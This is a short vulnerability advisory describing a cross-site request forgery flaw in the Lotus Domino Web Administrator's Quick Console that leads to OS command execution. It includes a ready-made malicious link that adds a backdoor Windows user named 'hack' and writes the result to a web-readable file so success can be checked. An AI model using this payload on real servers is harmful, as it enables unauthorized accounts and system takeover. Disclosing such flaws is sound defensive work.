Lotus Domino Web Administrator – Cross Site Command Execution

Description

Lotus Domino is vulnerable to CSRF attack which can de used for OS command execution in webadmin.nsf database by using Quick Console.

Lotus Domino is an IBM server product that provides enterprise-grade e-mail, collaboration capabilities, and custom application platform. Domino began life as Lotus Notes Server, the server component of Lotus Development Corporation's client-server messaging
technology. It can be used as an application server for Lotus Notes applications and/or as a web server. It also has a built-in database system in the format of NSF.

Details

Server is vulnerable to Cross Site Request Forgery attack.

One of the ways to execute this attack is Cross Site Command Execution.

By sending a special link to the administrator, an attacker can execute any command on the OS where Lotus is installed and get the result of the executed command.

Example:

An attacker can give the administrator the following link:

URL=http://server/webadmin.nsf/agReadConsoleData$UserL2?OpenAgent&Mode=QuickConsole&Command=load cmd /c net user hack hack123 /add > C:\Lotus\Domino\data\domino\html\download\filesets\netuser.png&1271932906681

If the administrator clicks this link, a command is executed which will add a new user to the OS.

The attacker can also check if it executes by reading the file

http://server/download/filesets/netuser.png